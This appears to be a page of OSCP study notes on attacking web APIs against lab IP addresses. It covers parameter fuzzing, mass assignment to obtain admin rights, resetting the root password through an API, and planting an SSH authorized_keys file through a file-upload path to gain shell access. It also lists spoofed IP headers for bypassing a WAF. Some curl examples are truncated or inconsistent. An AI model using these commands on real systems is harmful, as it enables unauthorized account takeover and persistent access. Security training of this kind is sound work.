> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/apis.md).

# APIs

## Fuzzing APIs

```
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
```

```
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/login/v1?FUZZ=1 
```

```
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/?FUZZ=1 
```

{% hint style="info" %}
Burp could also be used with Intruder + Sniper
{% endhint %}

## Rest APIs

APIs usually follow the format of `/api_name/v1` , we can enumerate using a gobuster pattern&#x20;

```
gobuster dir -w directories.txt -p apis_patt.txt -u http://192.168.205.249:33414/ -t100
```

#### Inspecting the API

<pre><code>curl -i http://192.168.205.249:33414/help 
<strong>curl http://192.168.205.249:33414/help | python -m json.tool 
</strong></code></pre>

{% hint style="info" %}
You should dir bust all api paths you find
{% endhint %}

#### Posting to an API

`curl -d '{"user":"admin", "password":"test"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/login/v1`

`curl -d '{"user":"admin", "password":"test", "admin":"True"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/register/v1`

#### Example: Changing root account password&#x20;

`curl`\
`'http://192.168.50.16:33414/user/v1/root/password'`\
`-H 'Content-Type: application/json'`\
`-H 'Authorization: OAuth eyJ0eXAiOiJKV1Q`\
`-d '{"password": "adot8"}'`

`curl -X 'PUT'`\
`'http://192.168.50.16:33414/users/v1/root/password'`\
`-H 'Content-Type: application/json'`\
`-H 'Authorization: OAuth eyJ0eXAiOiJKV1Q'`\
`-d '{"password": "adot8"}'`

#### Uploading Files

```
curl http://192.168.205.249:33414/file-upload -i -L -X POST -H "Content-type: multipart/form-data" -F file="@$(pwd)/authorized_keys.txt" -F filename='/home/alfredo/.ssh/authorized_keys'
```

## WAF Bypass

Add the  `X-Forwarded-For: 127.0.0.1` header to the request.

```
curl http://192.168.214.134:13337/logs -H 'X-Forwarded-For: 127.0.0.1'
```

```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
```
